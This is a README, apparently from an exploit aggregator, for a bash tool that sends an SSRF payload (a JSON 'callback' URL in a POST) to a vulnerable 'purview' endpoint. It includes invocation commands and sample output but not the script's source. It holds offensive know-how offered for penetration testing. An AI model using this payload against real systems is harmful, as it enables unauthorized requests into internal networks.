## https://sploitus.com/exploit?id=D1821C57-9D8B-5E8D-92D8-1CF9328514A3
# SSRF Exploit Script
This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**
## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI interface with clear error messages and help menu.
## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)
## Usage
### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```
### Options
| Option | Description |
|--------------------|--------------------------------------------------|
| `-h`, `--help` | Show the help menu. |
| `--exploit` `tu pu`| Perform the SSRF exploit with target and purview URLs. |
### Examples
#### Show Help Menu
```bash
./script.sh -h
```
Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```
#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```
Expected Output:
- If successful:
```
SSRF exploit successful! Data retrieved:
<response data>
```
- If unsuccessful:
```
SSRF exploit failed! HTTP code: <code>
```
## Script Workflow
1. The script parses the provided arguments.
2. Validates the provided URLs for correctness.
3. Sends an HTTP POST request with a JSON payload to the `purview_url`, attempting to exploit an SSRF vulnerability.
4. Prints the HTTP response or an error message based on the result.
## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```
### Payload Sent
```json
{
"callback": "http://callback-url.com"
}
```
### Response Handling
The HTTP response code and body are saved, and based on the status code, the success or failure of the exploit is determined.
## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.
## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.
## Contribution
Feel free to contribute by creating pull requests or reporting issues.
## License
[GNU GPL v3](LICENSE)
---
### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.